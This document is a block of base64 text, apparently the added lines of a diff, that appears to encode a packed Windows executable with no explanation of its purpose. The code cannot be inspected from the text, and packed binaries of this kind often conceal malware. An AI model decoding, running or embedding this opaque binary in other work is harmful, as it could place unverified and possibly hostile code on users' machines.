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
+AAEAAAA+AQCA8AAAgAAAAAA9qgMxAAAAAAAAAQAYBAAACAEAAEDEAQAUAAAAAAAAAAAAAAAGAEQA
+VgBDAEwAQQBMAAsAUABBAEMASwBBAEcARQBJAE4ARgBPAAgATQBBAEkATgBJAEMATwBOAFCRAQAo
+AAAAIAAAAEAAAAABAAQAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAgAAAAICAAIAA
+AACAAIAAgIAAAICAgADAwMAAAAD/AAD/AAAA//8A/wAAAP8A/wD//wAA////AAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAd3d3d3d3d3d3d3d3d3d3cHiIiIiIiIiIiIiIiIiIiHB4f///
+//////////////hweH/////////////////4cHh/////////////////+HB4f///////////////
+//hweH/////////////////4cHh/////////////////+HB4f/////////////////hweH//////
+///////////4cHh/////////////////+HB4f/////////////////hweH/////////////////4
+cHh/////////////////+HB4f/////////////////hweH/////////////////4cHh/////////
+////////+HB4f/////////////////hweH/////////////////4cHh/////////////////+HB4
+d3d3d3d3d3d3d3d3d3hweIiIiIiIiIiIiIiIiIiIcHhERERERERERERAAAAAAHB4RERERERERERE
